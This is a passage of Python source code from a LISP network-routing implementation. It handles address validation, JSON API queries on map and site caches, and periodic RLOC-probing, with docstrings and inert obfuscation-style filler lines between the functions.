    # Re-resolve Map-Resolver DNS names for the next round.
    #
    if (mr_dest_list != []):
        for mr in lisp_map_resolvers_list.values():
            mr.resolve_dns_name()

    return
if 40 - 40: I1ii11iIi11i
if 76 - 76: Oo0Ooo - I11i
if 82 - 82: OoO0O00 % oO0o . I11i / O0 - I1Ii111
if 39 - 39: I1IiiI
if 8 - 8: IiII * i1IIi * i1IIi * O0
if 69 - 69: Oo0Ooo
if 48 - 48: iII111i
if 11 - 11: i11iIiiIii * OoOoOO00 . OoO0O00
def lisp_valid_address_format(kw, value):
    """Validate a configured address string.

    Only applies when 'kw' is "address" (anything else returns True).
    Accepts: quoted distinguished-names, dotted-quad IPv4, geo-coordinate
    strings (dash-separated with an N/S/E/W hemisphere letter and at
    least 8 fields), 3-group hex MAC addresses, colon-separated IPv6
    (with at most one '::'), and E.164 numbers ('+' followed by digits).
    Returns True when 'value' matches one of these forms, else False.

    Fixes: an empty 'value' previously raised IndexError on value[0] —
    it now returns False; bare 'except' narrowed to 'except ValueError'
    (the only error int(x, 16) raises for a bad string).
    """
    if (kw != "address"): return (True)

    # Guard: empty strings would crash the subscripts below.
    if (value == ""): return (False)

    #
    # Distinguished-name: quoted string.
    #
    if (value[0] == "'" and value[-1] == "'"): return (True)

    #
    # IPv4: exactly four decimal octets, each 0..255.
    #
    if (value.find(".") != -1):
        octets = value.split(".")
        if (len(octets) != 4): return (False)

        for octet in octets:
            if (octet.isdigit() == False): return (False)
            if (int(octet) > 255): return (False)

        return (True)

    #
    # Geo-coordinates: dash-separated, contains a hemisphere letter and
    # at least 8 fields. Falls through to the MAC check when no
    # hemisphere letter is present.
    #
    if (value.find("-") != -1):
        fields = value.split("-")
        for hemisphere in ["N", "S", "W", "E"]:
            if (hemisphere in fields):
                if (len(fields) < 8): return (False)
                return (True)

    #
    # MAC address: exactly three dash-separated hex groups.
    #
    if (value.find("-") != -1):
        groups = value.split("-")
        if (len(groups) != 3): return (False)

        for group in groups:
            try: int(group, 16)
            except ValueError: return (False)

        return (True)

    #
    # IPv6: colon-separated hex groups, at most one '::' (which may be
    # leading or trailing).
    #
    if (value.find(":") != -1):
        groups = value.split(":")
        if (len(groups) < 2): return (False)

        seen_empty = False
        position = 0
        for group in groups:
            position += 1
            if (group == ""):
                if (seen_empty):
                    # Trailing '::' yields a final empty group — allow it.
                    if (len(groups) == position): break
                    # A leading '::' also yields two empties — allow that.
                    if (position > 2): return (False)

                seen_empty = True
                continue

            try: int(group, 16)
            except ValueError: return (False)

        return (True)

    #
    # E.164 telephone number: '+' followed by digits only.
    #
    if (value[0] == "+"):
        digits = value[1::]
        for digit in digits:
            if (digit.isdigit() == False): return (False)

        return (True)

    return (False)
if 18 - 18: oO0o * OOooOOo
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i - I1ii11iIi11i / iIii1I11I1II1
if 42 - 42: iIii1I11I1II1 / OOooOOo - O0 * OoooooooOO / i1IIi
if 33 - 33: OOooOOo . o0oOOo0O0Ooo % OoO0O00 - I1Ii111 . OoooooooOO
if 96 - 96: II111iiii % I11i / Ii1I - i11iIiiIii
if 63 - 63: I1IiiI
if 15 - 15: iIii1I11I1II1 - I1ii11iIi11i % OoO0O00 * II111iiii / I11i + I11i
if 23 - 23: I1IiiI
if 51 - 51: i11iIiiIii / ooOoO0o - OoooooooOO + OoOoOO00 + oO0o
if 57 - 57: iIii1I11I1II1
if 19 - 19: Ii1I / o0oOOo0O0Ooo + O0 / iIii1I11I1II1 + II111iiii
if 3 - 3: oO0o % OoO0O00 % OOooOOo
def lisp_process_api(process, lisp_socket, data_structure):
    """Handle an API IPC request of the form "<name>%<json-parms>" and
    send the JSON-encoded result back to the lisp-core process."""
    api_name, parms = data_structure.split("%")

    lprint("Process API request '{}', parameters: '{}'".format(api_name,
        parms))

    result = []
    if (api_name == "map-cache"):
        if (parms == ""):
            result = lisp_map_cache.walk_cache(lisp_process_api_map_cache, result)
        else:
            result = lisp_process_api_map_cache_entry(json.loads(parms))

    if (api_name == "site-cache"):
        if (parms == ""):
            result = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
                result)
        else:
            result = lisp_process_api_site_cache_entry(json.loads(parms))

    if (api_name == "map-server"):
        parms = {} if (parms == "") else json.loads(parms)
        result = lisp_process_api_ms_or_mr(True, parms)

    if (api_name == "map-resolver"):
        parms = {} if (parms == "") else json.loads(parms)
        result = lisp_process_api_ms_or_mr(False, parms)

    if (api_name == "database-mapping"):
        result = lisp_process_api_database_mapping()

    #
    # Encode the result and return it over IPC.
    #
    result = json.dumps(result)
    ipc = lisp_api_ipc(process, result)
    lisp_ipc(ipc, lisp_socket, "lisp-core")
    return
if 68 - 68: OOooOOo . IiII / iIii1I11I1II1 % i11iIiiIii
if 74 - 74: iII111i + i11iIiiIii
if 95 - 95: Ii1I
if 49 - 49: I1ii11iIi11i . i1IIi + OoO0O00 % O0 + OoO0O00
if 21 - 21: ooOoO0o * oO0o / OoooooooOO % ooOoO0o / O0
if 24 - 24: OoO0O00 - i11iIiiIii / i11iIiiIii * I1Ii111
if 20 - 20: IiII % iIii1I11I1II1 . iII111i + iIii1I11I1II1 + O0
def lisp_process_api_map_cache(mc, data):
    """Walk callback that gathers API data for one map-cache node:
    unicast entries are gathered directly, (*, G) nodes recurse into
    their source-cache."""
    if (mc.group.is_null()): return (lisp_gather_map_cache_data(mc, data))

    if (mc.source_cache == None): return ([True, data])

    #
    # (S, G) entries live in the node's source cache.
    #
    data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
    return ([True, data])
if 35 - 35: oO0o
if 65 - 65: II111iiii
if 87 - 87: oO0o / OoO0O00 - oO0o
if 69 - 69: i11iIiiIii
if 29 - 29: IiII . ooOoO0o / iII111i - OOooOOo / OOooOOo % Oo0Ooo
if 42 - 42: OoO0O00 . I1Ii111 . I1IiiI + Oo0Ooo * O0
if 35 - 35: Oo0Ooo / iII111i - O0 - OOooOOo * Oo0Ooo . i11iIiiIii
def lisp_gather_map_cache_data(mc, data):
    """
    Append a JSON-ready dict describing map-cache entry 'mc' to list
    'data'.  Returns [True, data] so walk_cache()-style callers keep
    iterating.
    """
    entry = {}
    entry["instance-id"] = str(mc.eid.instance_id)
    entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
    if not mc.group.is_null():
        entry["group-prefix"] = mc.group.print_prefix_no_iid()

    entry["uptime"] = lisp_print_elapsed(mc.uptime)
    # NOTE(review): "expires" is computed from mc.uptime, identical to
    # "uptime" above.  Looks like it should be derived from a refresh or
    # expiry timestamp instead -- confirm against the map-cache class.
    entry["expires"] = lisp_print_elapsed(mc.uptime)
    entry["action"] = lisp_map_reply_action_string[mc.action]
    entry["ttl"] = "--" if mc.map_cache_ttl is None else \
        str(mc.map_cache_ttl / 60)

    #
    # Describe each RLOC of the entry's rloc-set.
    #
    rloc_set = []
    for rloc in mc.rloc_set:
        r = {}
        if rloc.rloc_exists():
            r["address"] = rloc.rloc.print_address_no_iid()

        # NAT-traversal case: show the translated encapsulation port.
        if rloc.translated_port != 0:
            r["encap-port"] = str(rloc.translated_port)

        r["state"] = rloc.print_state()
        if rloc.geo: r["geo"] = rloc.geo.print_geo()
        if rloc.elp: r["elp"] = rloc.elp.print_elp(False)
        if rloc.rle: r["rle"] = rloc.rle.print_rle(False)
        if rloc.json: r["json"] = rloc.json.print_json(False)
        if rloc.rloc_name: r["rloc-name"] = rloc.rloc_name

        stats = rloc.stats.get_stats(False, False)
        if stats: r["stats"] = stats

        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)

        #
        # RLOC-probe history, only present once a reply has been seen.
        #
        reply_time = rloc.last_rloc_probe_reply
        if reply_time:
            r["last-rloc-probe-reply"] = lisp_print_elapsed(reply_time)
            r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)

        r["rloc-hop-count"] = rloc.rloc_probe_hops
        r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops

        r["recent-rloc-probe-rtts"] = \
            [str(rtt) for rtt in rloc.recent_rloc_probe_rtts]

        rloc_set.append(r)

    entry["rloc-set"] = rloc_set

    data.append(entry)
    return [True, data]
def lisp_process_api_map_cache_entry(parms):
    """
    API handler for a single map-cache lookup.  'parms' carries string
    keys "instance-id", "eid-prefix" and optionally "group-prefix".
    Returns a list of gathered entry dicts (empty when no match).
    """
    iid = parms["instance-id"]
    iid = 0 if iid == "" else int(iid)

    #
    # Build the lookup EID; by default it is both source and destination.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])
    dest = eid
    source = eid

    #
    # For an (S,G) lookup the group-prefix becomes the destination.
    #
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if "group-prefix" in parms:
        group.store_prefix(parms["group-prefix"])
        dest = group

    data = []
    mc = lisp_map_cache_lookup(source, dest)
    if mc:
        status, data = lisp_process_api_map_cache(mc, data)
    return data
def lisp_process_api_site_cache(se, data):
    """
    Gather API output for one site-cache entry.

    A unicast entry (null group) is gathered directly.  For an (S,G)
    entry, every source in its source-cache is walked and gathered.
    Returns [True, data] so the caller's cache walk continues.
    """

    #
    # Unicast entry: gather it directly.
    #
    if se.group.is_null():
        return lisp_gather_site_cache_data(se, data)

    #
    # (S,G) entry with no per-source cache yet: nothing to add.
    #
    if se.source_cache is None:
        return [True, data]

    #
    # Walk each source of the (S,G) entry and gather it.
    #
    data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
    return [True, data]
def lisp_process_api_ms_or_mr(ms_or_mr, data):
    """
    Return API info for one map-server (ms_or_mr True) or map-resolver
    (False).  'data' selects the peer either by "dns-name" or by
    "address".  The first match is returned as a one-element list; an
    empty list means no configured peer matched.
    """
    address = lisp_address(LISP_AFI_NONE, "", 0, 0)
    dns_name = data["dns-name"] if "dns-name" in data else None
    if "address" in data:
        address.store_address(data["address"])

    value = {}
    if ms_or_mr:
        for ms in lisp_map_servers_list.values():
            #
            # Match on DNS name when given, otherwise on exact address.
            #
            if dns_name:
                if dns_name != ms.dns_name: continue
            else:
                if address.is_exact_match(ms.map_server) == False: continue

            value["dns-name"] = ms.dns_name
            value["address"] = ms.map_server.print_address_no_iid()
            value["ms-name"] = "" if ms.ms_name is None else ms.ms_name
            return [value]
    else:
        for mr in lisp_map_resolvers_list.values():
            #
            # Match on DNS name when given, otherwise on exact address.
            #
            if dns_name:
                if dns_name != mr.dns_name: continue
            else:
                if address.is_exact_match(mr.map_resolver) == False: continue

            value["dns-name"] = mr.dns_name
            value["address"] = mr.map_resolver.print_address_no_iid()
            value["mr-name"] = "" if mr.mr_name is None else mr.mr_name
            return [value]

    return []
def lisp_process_api_database_mapping():
    """
    Return a list of dicts describing every configured database-mapping
    entry: EID-prefix, optional group-prefix, and its RLOC records.
    """
    output = []

    for db in lisp_db_list:
        entry = {}
        entry["eid-prefix"] = db.eid.print_prefix()
        if not db.group.is_null():
            entry["group-prefix"] = db.group.print_prefix()

        #
        # Describe each RLOC record; only non-empty records are kept.
        #
        rlocs = []
        for rloc_entry in db.rloc_set:
            r = {}
            if not rloc_entry.rloc.is_null():
                r["rloc"] = rloc_entry.rloc.print_address_no_iid()

            if rloc_entry.rloc_name is not None:
                r["rloc-name"] = rloc_entry.rloc_name
            if rloc_entry.interface is not None:
                r["interface"] = rloc_entry.interface

            # NAT-traversal: include the translated (global) RLOC if known.
            translated = rloc_entry.translated_rloc
            if not translated.is_null():
                r["translated-rloc"] = translated.print_address_no_iid()

            if r != {}: rlocs.append(r)

        #
        # Append RLOC-set to the entry and the entry to the output array.
        #
        entry["rlocs"] = rlocs

        output.append(entry)

    return output
def lisp_gather_site_cache_data(se, data):
    """
    Append a JSON-ready dict describing site-EID entry 'se' to list
    'data'.  Returns [True, data] so cache walkers keep iterating.
    """
    entry = {}
    entry["site-name"] = se.site.site_name
    entry["instance-id"] = str(se.eid.instance_id)
    entry["eid-prefix"] = se.eid.print_prefix_no_iid()
    if not se.group.is_null():
        entry["group-prefix"] = se.group.print_prefix_no_iid()

    entry["registered"] = "yes" if se.registered else "no"
    entry["first-registered"] = lisp_print_elapsed(se.first_registered)
    entry["last-registered"] = lisp_print_elapsed(se.last_registered)

    registerer = se.last_registerer
    registerer = "none" if registerer.is_null() else registerer.print_address()
    entry["last-registerer"] = registerer
    entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
    entry["dynamic"] = "yes" if (se.dynamic) else "no"
    entry["site-id"] = str(se.site_id)
    if se.xtr_id_present:
        entry["xtr-id"] = "0x" + lisp_hex_string(se.xtr_id)

    #
    # Describe each registered RLOC.
    #
    rloc_set = []
    for rloc in se.registered_rlocs:
        r = {}
        r["address"] = rloc.rloc.print_address_no_iid() if \
            rloc.rloc_exists() else "none"

        if rloc.geo: r["geo"] = rloc.geo.print_geo()
        if rloc.elp: r["elp"] = rloc.elp.print_elp(False)
        if rloc.rle: r["rle"] = rloc.rle.print_rle(False)
        if rloc.json: r["json"] = rloc.json.print_json(False)
        if rloc.rloc_name: r["rloc-name"] = rloc.rloc_name
        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)

        rloc_set.append(r)

    entry["registered-rlocs"] = rloc_set

    data.append(entry)
    return [True, data]
def lisp_process_api_site_cache_entry(parms):
    """
    API handler for a single site-cache lookup.  'parms' carries string
    keys "instance-id", "eid-prefix" and optionally "group-prefix".
    Returns a list of gathered entry dicts (empty when no match).
    """
    iid = parms["instance-id"]
    iid = 0 if iid == "" else int(iid)

    #
    # Build the lookup EID.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])

    #
    # Optional group for an (S,G) lookup; stays AFI-none otherwise.
    #
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if "group-prefix" in parms:
        group.store_prefix(parms["group-prefix"])

    data = []
    se = lisp_site_eid_lookup(eid, group, False)
    if se: lisp_gather_site_cache_data(se, data)
    return data
def lisp_get_interface_instance_id(device, source_eid):
    """
    Map a receive interface (and optionally the packet's source EID) to
    an instance-ID.

    When 'device' has no configured instance-ID, lisp_default_iid is
    returned.  When several multi-tenant EID-prefixes are configured on
    the same device, the source EID selects the longest matching prefix
    and that interface's instance-ID wins.
    """
    interface = None
    if device in lisp_myinterfaces:
        interface = lisp_myinterfaces[device]

    #
    # No interface (or no IID) configured -- use the default instance-ID.
    #
    if interface is None or interface.instance_id is None:
        return lisp_default_iid

    iid = interface.get_instance_id()
    if source_eid is None: return iid

    #
    # Multi-tenant case: find the longest multi-tenant EID-prefix on this
    # device that covers source_eid.  The more-specific test must be done
    # in the prefix's own instance-ID, so temporarily rewrite the source
    # EID's IID and restore it when the scan is done.
    #
    saved_iid = source_eid.instance_id
    best = None
    for candidate in lisp_multi_tenant_interfaces:
        if candidate.device != device: continue
        prefix = candidate.multi_tenant_eid
        source_eid.instance_id = prefix.instance_id
        if source_eid.is_more_specific(prefix) == False: continue
        if best is None or \
           best.multi_tenant_eid.mask_len < prefix.mask_len:
            best = candidate

    source_eid.instance_id = saved_iid

    if best is None: return iid
    return best.get_instance_id()
def lisp_allow_dynamic_eid(device, eid):
    """
    Return the dynamic-EID device name to use when 'eid' matches a
    dynamic-EID prefix configured on interface 'device', else None.
    """
    if device not in lisp_myinterfaces: return None

    interface = lisp_myinterfaces[device]

    # An explicit dynamic-eid device overrides the receive interface name.
    return_device = device if interface.dynamic_eid_device is None else \
        interface.dynamic_eid_device

    if interface.does_dynamic_eid_match(eid): return return_device
    return None
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
    """
    (Re)arm the global RLOC-probe timer so that
    lisp_process_rloc_probe_timer() fires in 'interval' seconds.  Any
    previously armed timer is cancelled first so only one is pending.
    """
    global lisp_rloc_probe_timer

    if lisp_rloc_probe_timer is not None:
        lisp_rloc_probe_timer.cancel()

    timer = threading.Timer(interval, lisp_process_rloc_probe_timer,
        [lisp_sockets])
    lisp_rloc_probe_timer = timer
    timer.start()
    return
def lisp_show_rloc_probe_list():
    """
    Debug dump of the global lisp_rloc_probe_list: for each RLOC address
    key, print every (rloc, eid, group) tuple that references it.
    """
    lprint(bold("----- RLOC-probe-list -----", False))
    for addr_str, entries in lisp_rloc_probe_list.items():
        lprint("RLOC {}:".format(addr_str))
        for rloc, eid, group in entries:
            lprint(" [{}, {}, {}, {}]".format(hex(id(rloc)),
                eid.print_prefix(), group.print_prefix(),
                rloc.translated_port))
    lprint(bold("---------------------------", False))
    return
def lisp_mark_rlocs_for_other_eids(eid_list):
    """
    The first (rloc, eid, group) tuple of 'eid_list' was already marked
    unreachable by the caller; propagate the unreachable state to the
    same RLOC for every other EID using it, log each transition, and
    push the affected map-cache entries to the external data-plane.
    """
    rloc, eid, group = eid_list[0]
    eid_strs = [lisp_print_eid_tuple(eid, group)]

    for rloc, eid, group in eid_list[1:]:
        rloc.state = LISP_RLOC_UNREACH_STATE
        rloc.last_state_change = lisp_get_timestamp()
        eid_strs.append(lisp_print_eid_tuple(eid, group))

    unreach = bold("unreachable", False)
    # Note: 'rloc' is the last tuple's RLOC here (or the first when the
    # list has one element) -- all tuples share the same RLOC address.
    rloc_str = red(rloc.rloc.print_address_no_iid(), False)

    for eid_str in eid_strs:
        e = green(eid_str, False)
        lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))

    #
    # Tell the external data-plane about each affected map-cache entry.
    #
    for rloc, eid, group in eid_list:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if mc: lisp_write_ipc_map_cache(True, mc)
    return
def lisp_process_rloc_probe_timer(lisp_sockets):
    """
    Periodic RLOC-probe worker (runs in a timer thread).

    Rearms the probe timer, then walks the global lisp_rloc_probe_list
    and sends a Map-Request RLOC-probe to each eligible RLOC, demoting
    RLOCs whose probes go unanswered to the unreachable state.
    """
    lisp_set_exception()

    # Rearm first so a failure below cannot stop future probe rounds.
    lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
    if lisp_rloc_probing == False: return

    # Optional debug dump of the probe list.
    if lisp_print_rloc_probe_list: lisp_show_rloc_probe_list()

    # Next-hops of the default routes; an RLOC whose configured next-hop
    # is not among them is considered unreachable.
    default_next_hops = lisp_get_default_route_next_hops()

    lprint("---------- Start RLOC Probing for {} entries ----------".format(
        len(lisp_rloc_probe_list)))

    count = 0
    probe_str = bold("RLOC-probe", False)
    for entries in lisp_rloc_probe_list.values():

        #
        # Each 'entries' list holds (rloc, eid, group) tuples that share
        # one RLOC address; probe once and suppress duplicates.
        #
        last_rloc = None
        for parent_rloc, eid, group in entries:
            addr_str = parent_rloc.rloc.print_address_no_iid()

            #
            # Policy check: never probe gleaned entries whose gleaning
            # policy disables RLOC-probing.
            #
            glean_allowed, probe_allowed, unused_mr = lisp_allow_gleaning(
                eid, None, parent_rloc)
            if probe_allowed == False:
                eid_str = green(eid.print_address(), False)
                addr_str += ":{}".format(parent_rloc.translated_port)
                lprint("Suppress probe to RLOC {} for gleaned EID {}".format(
                    red(addr_str, False), eid_str))
                continue

            #
            # Admin-down RLOCs are never probed.
            #
            if parent_rloc.down_state(): continue

            #
            # If the previous tuple probed the same address/port/name,
            # share its probe nonce and skip the duplicate probe.
            #
            if last_rloc:
                parent_rloc.last_rloc_probe_nonce = \
                    last_rloc.last_rloc_probe_nonce

                if (last_rloc.translated_port == parent_rloc.translated_port
                        and last_rloc.rloc_name == parent_rloc.rloc_name):
                    eid_str = green(lisp_print_eid_tuple(eid, group), False)
                    lprint("Suppress probe to duplicate RLOC {} for {}".format(
                        red(addr_str, False), eid_str))
                    continue

            #
            # Walk the chain of RLOCs (multi-homing via next_rloc links).
            #
            saved_nh = None
            rloc = None
            while True:
                rloc = parent_rloc if rloc == None else rloc.next_rloc
                if rloc == None: break

                #
                # Demote an up RLOC whose configured next-hop is no longer
                # one of the default-route next-hops.
                #
                if rloc.rloc_next_hop != None:
                    if rloc.rloc_next_hop not in default_next_hops:
                        if rloc.up_state():
                            device, nh = rloc.rloc_next_hop
                            rloc.state = LISP_RLOC_UNREACH_STATE
                            rloc.last_state_change = lisp_get_timestamp()
                            lisp_update_rtr_updown(rloc.rloc, False)
                            unreach = bold("unreachable", False)
                            lprint("Next-hop {}({}) for RLOC {} is {}".format(
                                nh, device, red(addr_str, False), unreach))
                        continue

                #
                # Still waiting on a probe-reply from an unreachable RLOC
                # within the probe interval -- don't pile on another probe.
                #
                last_time = rloc.last_rloc_probe
                delta = 0 if last_time == None else time.time() - last_time
                if rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL:
                    lprint("Waiting for probe-reply from RLOC {}".format(
                        red(addr_str, False)))
                    continue

                #
                # Nonce-echo machinery: a timed-out echo request means the
                # RLOC is unreachable; a recent echo makes probing redundant.
                #
                echo_nonce = lisp_get_echo_nonce(None, addr_str)
                if echo_nonce and echo_nonce.request_nonce_timeout():
                    rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
                    rloc.last_state_change = lisp_get_timestamp()
                    unreach = bold("unreachable", False)
                    lprint("RLOC {} went {}, nonce-echo failed".format(
                        red(addr_str, False), unreach))
                    lisp_update_rtr_updown(rloc.rloc, False)
                    continue

                if echo_nonce and echo_nonce.recently_echoed():
                    lprint(("Suppress RLOC-probe to {}, nonce-echo " +
                        "received").format(red(addr_str, False)))
                    continue

                #
                # No reply within the wait window: declare unreachable (but
                # still probe below) and mark the same RLOC for all other
                # EIDs that use it.
                #
                if rloc.last_rloc_probe != None:
                    last_time = rloc.last_rloc_probe_reply
                    if last_time == None: last_time = 0
                    delta = time.time() - last_time
                    if rloc.up_state() and \
                       delta >= LISP_RLOC_PROBE_REPLY_WAIT:
                        rloc.state = LISP_RLOC_UNREACH_STATE
                        rloc.last_state_change = lisp_get_timestamp()
                        lisp_update_rtr_updown(rloc.rloc, False)
                        unreach = bold("unreachable", False)
                        lprint("RLOC {} went {}, probe it".format(
                            red(addr_str, False), unreach))

                        lisp_mark_rlocs_for_other_eids(entries)

                rloc.last_rloc_probe = lisp_get_timestamp()

                flag_str = "" if rloc.unreach_state() == False else \
                    " unreachable"

                #
                # RLOCs reached via a specific next-hop need a temporary
                # host route so the probe egresses the right interface.
                #
                nh_str = ""
                next_hop = None
                if rloc.rloc_next_hop != None:
                    device, next_hop = rloc.rloc_next_hop
                    lisp_install_host_route(addr_str, next_hop, True)
                    nh_str = ", send on nh {}({})".format(next_hop, device)

                #
                # Log the probe being sent, with translated port and
                # RLOC-name decorations when present.
                #
                rtt = rloc.print_rloc_probe_rtt()
                rloc_str = addr_str
                if rloc.translated_port != 0:
                    rloc_str += ":{}".format(rloc.translated_port)

                rloc_str = red(rloc_str, False)
                if rloc.rloc_name != None:
                    rloc_str += " (" + blue(rloc.rloc_name, False) + ")"

                lprint("Send {}{} {}, last rtt: {}{}".format(probe_str,
                    flag_str, rloc_str, rtt, nh_str))

                #
                # Save (and remove) any host route already present for this
                # address so it can be restored after the probe is sent.
                #
                if rloc.rloc_next_hop != None:
                    saved_nh = lisp_get_host_route_next_hop(addr_str)
                    if saved_nh:
                        lisp_install_host_route(addr_str, saved_nh, False)

                #
                # An RLE-only record may carry a null RLOC -- fill it in
                # from the parent so the Map-Request has an address.
                #
                if rloc.rloc.is_null():
                    rloc.rloc.copy_address(parent_rloc.rloc)

                #
                # Send the RLOC-probe Map-Request.  For an (S,G) entry the
                # group is the destination and the EID the source.
                #
                seid = None if (group.is_null()) else eid
                deid = eid if (group.is_null()) else group
                lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
                last_rloc = parent_rloc

                #
                # Remove the temporary next-hop host route.
                #
                if next_hop:
                    lisp_install_host_route(addr_str, next_hop, False)

                #
                # Restore the host route that was present beforehand.
                #
                if saved_nh:
                    lisp_install_host_route(addr_str, saved_nh, True)

            #
            # Pace the probes: short sleep every 10 RLOCs.
            #
            count += 1
            if ((count % 10) == 0): time.sleep(0.020)

    lprint("---------- End RLOC Probing ----------")
    return
def lisp_update_rtr_updown(rtr, updown):
    """Report an RTR reachability change to the lisp-etr process.

    Sends a "rtr%<address>%<up/down>" IPC message so the ETR can react
    to the RTR's new state. Only meaningful when running as an ITR and
    only when we register a subset of RTRs based on reachability.
    """
    global lisp_ipc_socket

    #
    # Only the ITR process tracks RTR reachability for this purpose.
    #
    if (lisp_i_am_itr == False): return

    #
    # When all RTRs are registered regardless of state, reachability
    # changes do not alter the registered set, so say nothing.
    #
    if (lisp_register_all_rtrs): return

    rtr_str = rtr.print_address_no_iid()

    #
    # Ignore RTRs we never learned about.
    #
    if ((rtr_str in lisp_rtr_list) == False): return

    updown = "up" if updown else "down"
    lprint("Send ETR IPC message, RTR {} has done {}".format(
        red(rtr_str, False), bold(updown, False)))

    #
    # Build the IPC message and send it to the lisp-etr process.
    #
    ipc = "rtr%{}%{}".format(rtr_str, updown)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
    return
if 76 - 76: iII111i * OOooOOo
if 7 - 7: ooOoO0o + o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 73 - 73: IiII % I11i % i11iIiiIii + ooOoO0o
if 83 - 83: Ii1I * I1Ii111 * i11iIiiIii / iIii1I11I1II1 % I1ii11iIi11i
if 40 - 40: iII111i
if 21 - 21: I1Ii111 / iII111i + Oo0Ooo / I1ii11iIi11i / I1Ii111
if 33 - 33: OoooooooOO
def lisp_process_rloc_probe_reply(rloc, source, port, nonce, hop_count, ttl):
    """Process a received RLOC-probe reply.

    Finds the RLOC-probe-list entry for the replying RLOC — trying the
    RLOC address, RLOC:port, the packet source address, and source:port
    in that order — and passes the reply to every (rloc, eid, group)
    tuple stored under that key. Unmatched replies are logged and
    dropped.
    """
    reply_banner = bold("RLOC-probe reply", False)
    rloc_str = rloc.print_address_no_iid()
    source_str = source.print_address_no_iid()
    probe_list = lisp_rloc_probe_list

    #
    # A NAT-translated RLOC may be stored with its port appended, and
    # the reply may arrive from a source address different from the
    # probed RLOC. Try each candidate key in order.
    #
    key = None
    for candidate in [rloc_str, rloc_str + ":" + str(port), source_str,
        source_str + ":" + str(port)]:
        if (candidate in probe_list):
            key = candidate
            break

    if (key == None):
        lprint("    Received unsolicited {} from {}/{}, port {}".format(
            reply_banner, red(rloc_str, False), red(source_str, False),
            port))
        return

    #
    # Update probe state for each EID-prefix that uses this RLOC. An
    # RTR only accepts the reply on the matching translated port.
    #
    for rloc, eid, group in lisp_rloc_probe_list[key]:
        if (lisp_i_am_rtr and rloc.translated_port != 0 and
            rloc.translated_port != port): continue
        rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)

    return
if 34 - 34: OoO0O00 . i1IIi + IiII * IiII
if 76 - 76: OOooOOo
if 54 - 54: O0 * II111iiii * OOooOOo
if 44 - 44: I1IiiI
if 66 - 66: o0oOOo0O0Ooo
if 40 - 40: OOooOOo * Ii1I
if 38 - 38: ooOoO0o
if 5 - 5: OoooooooOO + iII111i - I11i
def lisp_db_list_length():
    """Return the effective number of database-mapping entries.

    A database entry with dynamic-EIDs counts once per dynamic-EID,
    otherwise once; each IID in the EID's iid-list adds one more.
    """
    total = sum(
        (len(db.dynamic_eids) if db.dynamic_eid_configured() else 1) +
        len(db.eid.iid_list) for db in lisp_db_list)
    return (total)
if 7 - 7: I1ii11iIi11i
if 37 - 37: O0 . II111iiii
if 70 - 70: o0oOOo0O0Ooo / iII111i + i1IIi + I11i % iIii1I11I1II1 % Oo0Ooo
if 1 - 1: O0 + OoO0O00 . i11iIiiIii + I1Ii111 - OoO0O00 - IiII
if 1 - 1: I1ii11iIi11i / i1IIi . I1IiiI / Ii1I
if 19 - 19: iIii1I11I1II1 / Oo0Ooo . O0 - Oo0Ooo
if 74 - 74: I1ii11iIi11i * OoooooooOO . iII111i
if 45 - 45: I1IiiI - IiII % ooOoO0o - IiII . Oo0Ooo - o0oOOo0O0Ooo
def lisp_is_myeid(eid):
    """Return True when 'eid' is covered by (is more specific than) one
    of our configured database-mapping EID-prefixes."""
    return (any(eid.is_more_specific(db.eid) for db in lisp_db_list))
if 64 - 64: iIii1I11I1II1 - OOooOOo . iII111i % o0oOOo0O0Ooo / II111iiii % OoooooooOO
if 87 - 87: OoooooooOO
if 70 - 70: o0oOOo0O0Ooo % OoooooooOO % I1IiiI . OoOoOO00 * I1IiiI - ooOoO0o
if 92 - 92: I1IiiI . I11i
if 66 - 66: I1Ii111 / I11i / OoooooooOO % OoOoOO00 . oO0o * iII111i
if 34 - 34: I1ii11iIi11i * I1ii11iIi11i % I11i / OOooOOo % oO0o . OoOoOO00
if 25 - 25: I1ii11iIi11i / I11i + i1IIi . I1IiiI + ooOoO0o
if 29 - 29: IiII + I1ii11iIi11i
if 8 - 8: IiII % I1IiiI
def lisp_format_macs(sa, da):
    """Format two 12-hex-digit MAC strings as a display string of the
    form "xxxx-xxxx-xxxx -> xxxx-xxxx-xxxx"."""
    def dashify(mac):
        # Insert dashes every 4 characters of the 12-character string.
        return ("-".join([mac[0:4], mac[4:8], mac[8:12]]))

    return ("{} -> {}".format(dashify(sa), dashify(da)))
if 10 - 10: OoooooooOO / OoOoOO00
if 77 - 77: OoOoOO00
if 10 - 10: IiII / i11iIiiIii
if 19 - 19: OoO0O00
if 100 - 100: I1ii11iIi11i - I1ii11iIi11i
if 38 - 38: I1Ii111
